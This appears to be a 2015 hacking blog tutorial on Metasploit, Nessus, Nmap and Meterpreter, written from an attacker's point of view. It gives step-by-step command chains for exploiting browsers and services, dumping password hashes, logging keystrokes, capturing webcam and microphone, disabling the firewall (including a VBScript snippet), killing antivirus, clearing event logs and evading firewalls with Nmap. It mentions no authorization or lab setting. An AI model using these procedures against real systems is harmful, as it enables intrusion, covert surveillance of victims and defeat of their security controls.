Nessus and POST Exploitation in MetaSPLOIT

Friday, 15 May 2015

Nessus Basics 

Nessus is a properietary vulnerability scanner
It detects
> vulnerabilites
> misconfiguration
> default credentials on target system
> used in various compliance audits as well
===================
  Learn how to use Meterpreter in Metasploit => Meterpreter Basics

Metasploit Basics => Metasploit Basisc
======================================================

To open Nesses
    msfconsole -> type load nessus -> nessus_help

Connect to Nessus from our localhost for starting the scans
syntax
    nessus_connect <your username>:<your Password>@localhost:8834 <ok>
Example
    nessus_connect prasoonnigam:hacker09@localhost:8834 ok
8834 is the default port

Check the nessus scanning policies

Syntax
    nessus policy list

Four policies of Nessus
1) External network scan -> used for scanning network vulnerabilities externally
2) Internal network scan -> used for scanning network vulnerabilities internally
3) Web App Tests -> used for scaning web application for vulnerabilities
4) PCI-DSS (Payment Card Industry-data Security Standard) audits -> used in payment card industry as the data security standard

Scanning victim machine

> have to create a new scan
syntax
    nessus_scan_new <policy ID> <scan name> <target ip>
example
    nessus_scan_new -2 windowssan 192.168.3.2
> checking the status
    nessus_scan_status
> checking for the report list
    nessus report list
> opening the report
    nessus_report_hosts <report ID>
    example : nessus_report_hosts dgfwef82nd8934y89hg9rety389
>> when u see the severity, u r getting the total number of vulnerabilities

Classifications of the different vulnerabilities

> Sev 0 indicates high level vulnerabilities
> Sev 1 indicates medium level vulnerabilities
> Sev 2 indicates low-level vulnerabilities
> Sev 3 indicated informational vulnerabilities

Command to see all the vulnerabilities

    nessus_report_hosts_ports <target IP> <report id>
    example : nessus_report_hosts_ports 192.168.11.164 asjfh398fdbf5t705tdb4t9

Report Importing In Metasploit

> Importing Nmap report via msfconsole in PostgreSQL database
    save any host and save the nmap report in XML format

>> Check the database connectivity with the msfconsole
    syntax : db_status

> import the Nmap report
    syntax: db_import <report path name with name>
    example: db_import /root/Desktop/scan.xml

>> see the host details
    syntax: host <ip> <hostname on which nmap scan performed>
    Example: host 192.168.11.23
you will get to know OS and Mac Address

>> check the open port and services running on those ports
    syntax: services <hostname>
    example: services 192.168.0.102

> Importing the report of nessus in msfconsole
    syntax:    db_import <report path name with file location>
    example: db_import /root/Desktop/Nessus_scan.nessus

>check the vulnerabilities
    syntax: vulns <ip (hostname)>
    example: vulns 192.168.22.16


CLient Side Exploitation

 What are Client Side Attacks ???

> The Server is the main computer that shares its resources over the network and the client which are the other computer on the network use these resources..

> There is a large arrau of attacks that may be launched against the clients
such as
> browser-based attacks
> vulnerable service exploitation
> Client OS have multiple applications such as PDF Reader, Document Reader and instant messenger

> The malicious code may exploit any form of ActiveX JAVA and Flash.. in browser

Exploits of Victim browser

> browser autopwn
    msfconsole -> use auxiliary/server/browserautopwn -> show options -> set LHOST 192.168.2.23 (required field that to be filled) -> set SRVHOST 192.168.3.22 (SRVHOST means localhost address (set out local machine address)) -> set SRVPORT 80 (SRVPORT means the local port address) -> run

after type in the run it starts the exploit modules on the localhost and also it provides the malicious URL which must be given and must be clicked

    -> TO check the meterpreter session that was created type in "sessions"

(getting into the computer and creating session)
-> session (shows the ID) -> session -i 1 <id> -> sysinfo

> Internet Explorer Shortcut Icon Exploit
    shortcut icons that contain a malicious DLL

    msfconsole -> use windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST 192.168.2.3 -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1

> Internet Explorer malicious VB script code execution exploit

    msfconsole -> use exploit/windows/browser/ms10_022_ie_vbsscript_winhlp32 -> show options -> set SRVHOST 192.168.11.105 -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL
after F1 is pressed the malicios VB script will run in the browser and send a payload names calc.exe -> sessions -> sessions -i 1


                      POST Exploitation


    Post Exploitattion basically means the phases of operation once a victim's system has been compromised by the attacker.The value of the compromised system is determined by the value of the actual data stored in it and how an attacker may make use of it for malicious purposes...
    The concept of post exploitation has risen from this fact only as to how you can use the victim's compromised system's information; documenting it, and haing an idea of the configuration channels...

Phase of post exploitation
> Understanding the victim
> Privilege escalation
> Cleaning tracks and staying undetected
> Collecting system information and data
> Setting up backdooring and rookits
> Pivoting to penetrate internal networks

Lets the first phase of post exploitation by gathering as much information

Type in :
    sysinfo (get system info)
    getpid (get process ID)
    ps (get process list)
    run checkvm (the victim's system is a virtual machine or not)
    idletime (to check whether the victim is active or not)
    run get_env (the victim's system evironment by another meterpreter script)
    ipconfig (check the victim's system IP address)
    route (to see the full network settings)
    run getcountermeasure (for mapping the security configuration of the victim's systmem)
    run getgui (enable the victim's Remote Desktop Protocol service)
    run getgui -e
    run gettelnet (enabling the telnet service)
    run gettelnet -e
    run get_local_subnets (see the local subnet of the victim's)
    run hostedit (allows an attacker to add host enteries in the windows host file)
    run hostedit -e 127.0.0.1 www.apple.com
    run enum_logged_on_users (how many users are currently logged in)
    run enum_logged_on_users -c
    run get _application_list (it will show us all the installed applications)
    run windows/gather/forensics/enum_drives (gathering physical drive)
    run windows/gather/enum_ms_product_keys (get OS system's product key)
    run windows/gather/credentials/windows_autologin (check autologin feature)
    run winenum (dump some juicy information such as hashes and tokens)
    cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> LS
    cat hashdump.txt
    run scraper
    .msf4/logs/scripts/scraper/192.168.0.104_201330 -> cat services.txt


Post Exploitation Privilege Escalation

> Post exploitation is divided into five phases

Understanding Privilege Escalation
    Privilege Escalation in simple terms is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users....
Example:- Things we can do after privilege escalation are installing malicious software for unethical uses
> deleting user files
> denying resources to a particular user
> viewing private information

Divided into two major forms :-
> Vertical Privilege Escalation
> Horizontal Privilege Escalation

Vertical Privilege Escalation
    a lower privileged user or application may access function that are reserved only for authorized or administrative users. This features is also known as privilege elevation..

Horizontal Privilege Escalation
    This escalation usually happens on a horizontal scale with repect t user rights. A normal user accessing the resources reserved for another person's resources

Exploiting the vicitim's system
> we use a software name called mini-share (free file sharing software)

Commands
    open msfconsole -> use ecploit/windows/http/minisgare get overflow -> show options -> set RHOST 192.168.11.203 (victim ip) -> set RPORT 80 -> show targets -> set TARGET 3 (choose the options) -> exploit ->

(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 -> ps


Privilege escalation by post exploitation
    Module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.

(Meterpreter)     run post/windows/escalate/getsystem

        run post/windows/escalate/service_permissions
(Module exploits the existing administrative privileges to obtain a system session. If it Fails in the 1st instance, the module inpsects the existing service and looks for insecure file permissions that are vulnerable to an attack)

Different Exploit for compromising the target system
    msf> exploit/windows/browser/ms10 002 aurora -> show options -> set SRVHOST 192.168.0.109 (Victim IP) ->  exploit -> session -> session -i 1


Post Eploitation Cleaning Up Traces
    Cleaning Tracks and trace through log deletion and staying undetected by disablig the firewall and antivirus systems

Why Firewall is important ?
A firewall is basically software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well-configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets.
It decides whether it should allow the packet through the firewall or not.

A firewall is classified into three different types:
> Packet Filter Firewall
> Stateful Firewall
> Application Firewall

Packet Filter Firewall
    These types of firewall are associated with the first three layers of the OSI Model with a little help from the transport layer as well, for the source and destination port numbers. When a packet travels towards the packet filter firewall, it is analyzed with the help of set rules to match against.

Stateful Firewall
    These are also called second-generation firewalls. These firewalls work on the states of a network connection.Throughout the state, it determines whether to allow the packet into the network or not.

Application Firewall
    These are known as third-generation firewalls. Application firewalls work on application and protocols like HTTP, SMTP and SSH.They also help in detecting if an unwanted protocol is trying to bypass the firewall on an allowed port.

commands
    run getcountermeasure
        operational mode         = Enable

        -> shell -> netsh firewall show opmode
see if the firewall is enable or not
        -> shell -> netsh firewall set opmode mode=disable

Disabling firewalls through VBScript

    Code
        Set objFirewall = CreateObject("HNetCfg.FwMgr")
        Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
        objPolicy.FirewallEnabled = FALSE
save code .vbs extension

syntax        upload <source filepath> <destination filepath>
Example        upload root/Desktop/disable.vbs C:\

    Goto destination and execute it


Antivirus Killing and Log Deletion

killing the processes of an antivirus with the help of post exploitation Meterpreter script known as killav

Script of killav.rb
        opt/framework/msf3/scripts/killav.rb

in killav.rb the name of the antivirus must be present there then only antivirus must be stoppped..

(Meterpreter) run killav -> tasklist (to see the taskmanager process) or tasklist /svc or tasklist /svc |find/I "avg"

> TO see the property th processes that are running
        sc queryex avgwd -> sc config (process name) start= disabled (disable the process which cannot be killed)
Terminating a processes
    taskkill /F /IM "antivirus name*"


Clearing tracks to be SAFE

Clearing all the log
 (Meterpreter) clearev

NMAP in METASPLOIT

Saturday, 2 May 2015

             NMAP (Network Mapper)
                                                                  using nmap in metasploit

> Nmap is a powerful security scanner developed by Gordon Lyon


===============
Metasploit => How to use metaploit click on me :)

MeterPreter BASics => How to use Meterpreter click one me :)
=============================================


NMAP TUTORIALS => NMAP TUTORIALS CLick on me :)


How nmap works ??

> Whenever Nmap performs a scan, it delivers an ICMP echo request to the destination for checking whether the host is alive or dead. This process saves much time for Nmap when it scans multiple hosts at a time. Sometimes ICMP requests are blocked by firewalls, so as a secondary check namp tries to connect to default open ports such as 80 and 443, which are used by the web server or HTTP..

Working with NMAP in Metasploit

Nmap is used for
> hosts
> service
> open ports detection on a computer network

Nmap has many features
> stealth scan
> aggressive scan
> firewall evasion scan
> has the abiity to fringerprint operating system
>>>>> Nmap has its own Nmap Scripting Engine -> can be used with Lua programming language

Nmap scanning using Metasploit
Nmap with no commands will perform a basic scan on the target address

syntax
    nmap <target> <ip_address>
    nmap 192.168.11.29

Scan multiple targets
syntax
    nmap <target target>
    nmap 192.168.11.46 192.168.11.29

Scan a list of targets
    >> just need to separate all targets by a new line or space
        for example
            192.168.11.29
            192.168.11.86
            192.168.11.36 and so on

syntax
    nmap -iL <list.txt>
    nmap -iL /root/Desktop/list.txt

Nmp Options
> Nmap commands options
©Pprasoon Nigam
Feature                                                                           Options
> Don't ping                                                                        -PN
> Perform a Ping Only Scan                                               -sP
> TCP SYN Ping                                                                -PS
> TCP ACK Ping                                                                -PA
> UDP Ping                                                                         -PU
> SCTP INIT Ping                                                              -PY
> ICMP Timestamp Ping                                                    -PP
> ICMP Echo Ping                                                              -PE
> ICMP Address Mask Ping                                               -PM
> IP Protocol Ping                                                               -PO
> ARP Ping                                                                         -PR
> Traceroute                                                                        -traceroute
> Force Reverse DNS Resolution                                        -R
> Disable Reverse DNS Resolution                                     -n
> ALternative DNS Lookup                                                --system-dns
> Manually Specified DNS Server(S)                                  --dns--servers
> Create a Host List                                                              -sL

Examples
> nmap -sP 192.168.11.60  (Ping only scan)
> nmap -PA 192.168.11.46  (TCP ACK Ping)
> nmap -PE 192.168.11.44  (ICMP echo ping)
> nmap -R 66.147.244.90   (Force reverse DNS resolution)


NMAP advanced scanning options

Features                                                                           Options
> TCP SYN Scan                                                              -sS
> TCP Connect Scan                                                         -sT
> UDP scan                                                                       -sU
> TCP Null Scan                                                               -sN
> TCP Fin Scan                                                                -sF
> Xmas Scan                                                                     -sX
> TCP ACK Scan                                                              -sA
> Custom TCP Scan                                                         -scanflags
> IP Protocol Scan                                                            -sO
> Send Raw Ethernet Packets                                          --send-eth
> Send IP Packets                                                             --send-ip

FLAGS                Usage
> SYN                Synchronize
> ACK                Acknowledgement
> PSH                 Push
> URG               Urgent
> RST                Reset
> FIN                 Finished


Examples
> nmap -sS 192.168.11.46 (TCP SYN scan) attempts to identify ports by sending a SYN packet to the target & waititng for a response. A SYN packet is basically  sent to indicate that a new connection is to be established. This type is also know as the stealth scan.
> nmap -sN 192.168.2.33 (TCP null scan) sends packets without TCP flags enabled . This done by setting the header to zero for fooling a firewalled  system in getting a response them

Custom TCP Scan
> nmap -scanflags SYNURG 192.168.0.102

Port scanning options
Features                                                Options
> Perform a Fast Scan                                    -F
> Scan Specific Ports                                     -p(port)
> Scan Ports by Name                                    -P(name)
> Scan Ports by Protocol                                -p U:(UDP Ports), T:(TCP Ports)
> Scan All Ports                                              -p"*"
> Scan Top Ports                                             --top-porys
> Perform a Sequential Port Scan                   -r

Examples
> nmap -F 1962.168.11.46 (Fast scan)
> nmap -p http 192.168.3.8 (scan port by name)
> nmap -r 192.168.3.88 (Performing a Sequential port scan) (useful for evading firewall and Intrusion Prevention System

Nmap has some feature that help to byoass these protection mechanism as well

Feature                                                                   Options
> Fragments Packets                                             -f
> Specify a Specific MTU                                    --mtu
> Use a Decoy                                                      -D
> Idle Zombie Scan                                             -sI
> Manually Specify a Source Port                      --source-port
> Append Random Data                                      --data-length
> Randomize Target Scan Order                          --randomize-hosts
> Spoof MAC Address                                        -spoof-mac
> Send Bad Checksums                                        --basums

Examples
> nmap -f 192.168.12.88 (fragment packets) Nmap sends very small 8 byte packets.. useful for evading improperly configured firewall system

> nmap -sI 192.168.3.88 192.168.11.56 (Idle Zombie scan) very unique scanning technique in which Nmap uses zombie host for scanning the target, In here use 2 IP address

Spoof MAC Address
This technique is useful when a firewalled-system detects a scanning process via the system's MAC address and blacklistes those MAC Address
MAC addresses can be spoofed via three different arguments

Arguments                                     Function
0 (zero)                                        Generates Random MAC Address
Specific Mac Address                  Uses the specified MAC Address
Vendor Name                               Generate a MAC Address from the specifies Vendor
                                                     (such as Apple Dell HP etc)

syntax
nmap -sT -Pn --spoof-mac Apple 192.168.11.29

Save Nmap output results
Features                                                    Options
Save Output to a Text File                            --oN
Save Output to a XML File                          --oX
Grepable Output                                            -oG
Output All Supported File Type                     -oA
Periodically Display statistics                        --stats-every
133t Output                                                     -oS

syntax
nmap -oX <scan.xml> <target>

example
nmap -oN scan.txt 192.168.11.46

METERPRETER BASICS


                                               METERPRETER Basics

AFTER U GET A SESSION WITH THE HELP OF Metasploit HOW TO USE meterpreter HERE IS ARE THE basics

HERE's THE SECRET


Meterpreter is one of the spearheads in the metasploit framework..
It is used as a payload post exploitation of a vulnerable system.
It is used in memory DLL injection Stagers and is extended over the network at runtime.
In Memory DLL, Injection is a technique used for injection code within that address space of  currently running process by forcing it to a load a DLL (Dynamic-Link Libarary) file

The single payload is very effective with its multiple capabilities
> helps in acquiring password hashes of a victim machine
> runnng a kylogger and
> privilege escalation.

The stealth feature makes it undetectable to many antivirus and host based intrusion detection systems
Meterperter also has the capability to switch between different processes to which it gets attached through DLL injections and stays by clinging to running application on the compromised host rather than creating on the system

Classified commands

> Command type
> Command name
> Description

Commands
Process listing

> getuid -> It gets the system ID & the name of the computer
> kill -> It terminates a process
> ps -> It lists the running processes
> getpid -> It gets the current process identifier

Keylog Usage
> keyscan_start -> It starts the keylogging session
> keyscan_stop -> It stops the keylogging session
> Keyscan_dump -> It dumps the keystrokes captured from the victim machine

Session
> enumdesktops -> It lists all of the accessible desktops and workstations
> getdesktop -> It gets the current Meterpreter desktop
> setdesktop -> It changes the Meterpreter's current desktop

Sniffer Functions
> use sniffer -> It loads the sniffer functions
> sniffer_start -> It starts the sniffer for the interface
> sniffer_dump -> It dumps the network capture of the victim machine locally
> sniffer_stop -> It stops the sniffer for the interface

Webcam Commands
> webcam_list -> It lists all of the webcams of the system
> webcam_snap -> It capture snaphots of the victim machine
> record_mic -> It records the sound of the environment from the default microphone on the machine

> sysinfo -> to check the system information
> screenshot -> capture a screenshot of the victim machine
> ps -> will show the running processes

*> migrate <pid> :: example migrate 1512 (explorer.exe) -> getpid -> keysscan_start (and wait for few minutes to capture the keystrokes of the victim machine ) -> keyscan_dump -> keyscan_stop (to dump and stop the keystrokes command )

*> webcam_snap ( u get the snap from the webcame)

*> shell (to get the command shell of the victim) -> mkdir <directory name> (creating a directory) (shell is the cmd of the of the victim computer)


Vulnerability scanning and Information Gathering

:> Information Gathering Through Metasploit
Information gathering is a process of collecting information about a victim techniques.
Divided into two steps
> Footprinting
> Scanning

The Metasploit auxilliary modules have various scans from ARP to SYN
service-based scans
> HTTP
> SMB
> SQL
> SSH

Methods for Information Gathering


>> whois
         It is widely used for quering databases that store registered users of an Internet resource

type in msfconsole
   whois <domain name>
example whois hackingrtz.com

To get e-mail we use e-mail harvesting
>  E-mail harvesting is very useful tool to get the e-mail IDs associated with a particular domain

syntax
 use auxiliary/gather/ search email collector -> show options -> set domain <domain name> -> run
for example :- set domain hackingartz.com

Active Information Gathering

useful auxiliary scanner is the telnet version scanner

syntax
  use auxiliary/scanner/telnet version -> show options -> See the area is empty

syntax
   set RHOSTS <target ip address>
   for example :-  set RHOSTS 192.168.0.103 -> run

To find whether a Remote Desktop connection (RDP) is available by RDP scanner
TO know aboout the port number RDP port

Syntax : type in
     use auxiliary/scanner/rdp/ms12_020_check -> show options
getteing the port we set RHOST

syntax
    set PORTS (port no.) -> set PORTS 3389
    set RHOST (ip address) -> set RHOST 192.168.11.46
done with all the options type run

MetaSPLOIT BASICS

Friday, 1 May 2015


                           METASPLOIT

>Metasploit Framework is an open source project created by HD Moore in 2003  acquired by Rapid 7 LLC on October 21,2009.
>Which includes hundreds of exploits and payloads.
>It is considered one of the best penetration tools with support for vulnerability assessment using Nessus and other famous tools.
>Its written in Ruby....
>Metasploit supports all platforms including Windows, Linux and MAC Os

*************
use nmap in metassploit => NMAP in metasploit click on me :)

METERPRETER BASICS => LEARN how to use METERORETER Click on me :)
Cross Site Scripting => Click on me :)
***************************************

Metsaploit Framework these
> MsfGUI
> Msfcli
> Msfweb
> Metasploit Pro
> Armitage

The library architecture in Metasploit is as follows:

> Rex: This is the basic library used is Metasploit for various protocols, transformations and socket handling. It supports SSL, SMB, HTTP, XOR, BASE64, and random text...

>Msf :: Core: This library defines the framework and provides the basic application interface for Metasploit.

>Msf::Base
This library proviedes a simplified and friendly applcation interface for the the Metasploit Framework

*) cd /opt/metasploit/msf3 to enter the metasploit framework directory -> ls

> The important directories listed are
data
external
tools
plugins
scripts

cd data/ => contains meterpreter exploits wordlists templates & many more

cd meterpreter/ => .dll files (.dll files as well as other interesting things, which are typically required to enable the Meterpreter Functionality called post exploitation.)

> wordlist directory -> directory in the data directory. This directory contains the list of usernames and paswords for different services such as HTTP, Oracle, Postgres, VNC, SNMP and more.

> To update the metasploit -> msfupdate

Exploits 

An exploit is a computer program that takes advantage of a particular vulnerability
> cd /opt/metaspoit/msf3/modules/exploits -> ls -> cd windows (going into windows) -> ls
so view the code of any exploit we type -> cat <exploitname> -> cat ms08_067_netapi.rb

Auxiliary
Auxiliary are exploits without payload.

> There are different types of auxiliary modules such as
scanner for protocols
Networks protocol fuzzers
Port scanner modules
wireless
Denial service modules
Server modules
Administrative access exploits and so on.

**) ls -> ftp -> cat <modules name> to see the exploit

PAYLOADSA payload is a piece of software that runs after a system is compromised. The payload us typically attached to and delivered with an exploit

*) 3 different types of payloads
> Singles
> Stagers
> Stages

Stages : The main role of stages payload is that they use tiny stager to fit into small exploitation spaces. During exploitation, an exploit developer has a very limited amount of memory that he can play with. The stagers use this space and their work is to pull down the rest of the stages payload.
Stages are the type of payload that are downloaded and executed by the stagers payload such as Meterpreter, VNC server and so on.

Singles : Singles are self contained payloads for a specific tasl such as creating a user, binding a shell, and so on.

Stagers :  The stagers use the space and their work is to pull down the rest of the stages payload.
Stagers are payloads that makes a connection between the attacker ad the victim machine.
Example
If i want to inject a meterpreter payload we cannot fit the entire Meterpreter DLL into one payload, so the entire process is broken up into two parts. The first is the smaller payload  called stagers. After the stagers are executed they make a network connection between the attacker and the victim.
Over this network connection a larger payload is delivered to the victim machine and this larger payload is known as stages.


> Payloads are categorized according to OS such as AIX, BSD, Windows, Linux and so on.

EXPLOITATION

Exploitation refers to the ar of compromising a computer system. The basics of computer exploitation involves a deep understanding of the vulnerabilities and payloads.
An exploit is a piece of well-written code, compiled and executed on a trageted system, which may compromise that system.

An exploit usually targets a known vulnerability, a flaw in a service or a poorly written code.

BASIC TERMS OF EXPLOITATION

> Vulnerability : A vulnerability is a security hole in software or hardware, which allows an attacker to copromisea system. A vulnerability can be as simple as a weak password or as complex as a Denial of Service attack

> Exploit : An exploit refers to a well known security flaw or bug with which  a hacer gains entery intoa system. An exploit is the actual code with at attacker takes advantage of a particualar vulnerability.

> Payload : Once an exploit exectes on the vulnerable system and the system has been compromised, the payload enables us to control the system. The payload is typically attached to the exploit and delivered.

> Shellcode : This is a set of instructions usually used as a payload when the exploitation occurs.

> Listener : A listener works as component waiting for an incoming connection.

======================
KEEP safe ur ANDROID => CLICK ON me ;)
10 PROXY Websites => Click on me :))
=============================================

The Biggest question of how exploitation actually works ?????

Heres' the SECRETS FINALLY REVEALED

An attacker basically sends an exploits with an attached payload to the vulnerable system.
The exploit runs first and if it succeeds, the actual code of the payload runs.
After the payloads runs, the attacker gets fully privileged access to the vulnerable system, and then he may download data upload malware, virus, backdoors or whatever he wants.

How to compromising a system

Step 1 : Scan the IP Address to find
                           open ports -> operating system -> services
Step 2 : Identifying a vulnerable service and finding an exploit in Metasploit for that particular service.

Step 3 : Is the exploit is not available in Metasploit :: go for through the internet databases such as
>> www.securityfocus.com
>> www.exploitdb.com
>> www.1337day.com

Step 4 : After successfully finding an exploit

Step 5 : we launch exploit and compormise the system.


Tools used

> Port scanning are Nmap (Network Mapper),Autoscan, Unicorn Scan and so on.

Syntax for nmap
  nmap -v -n ip address

-v verbose -> to get verbose output
-n -> parameter to disable reverse DNS resolutions

Syntax for intense scan by nmap
  nmap -T4 -A -v ip address

====================
NMAP tutorials => Click on me :)
Recover JPEG FILES => CLick on me :))
==================================================

After gathering information -> opne msfconsole -> search dcom (it searches all of the windows RPC Related exploits in its database.........

Searching for an exploit in Metasploit through the
syntax
search <servie name> command
© Pprasoon nigam
Note : if the exploit is not available in Metasploit, then we have to search the Internet exploit database for that particular exploit.

>> How to search for an exploit on these online services
open this website => www.1337day.com
  Search for exploits on the Windows RPC service
find the exploit and save it

Now we exploit the target machine

as we know that scanned the IP address and found all the ports
and exploit one those ports

launch the terminal -> type gcc <exploit name with path > -o <exploitname>
for example
gcc dcom.c -o dcom

./<filename>

use exploit/windows/smb/ms08_067_netapi (in msf console) and press enter

then show options
RHOST (remote host)

set RHOST ip address

exploit

MORE metasploit BASICS and HACKING => METERPRETER => Meterpreter Click on me :)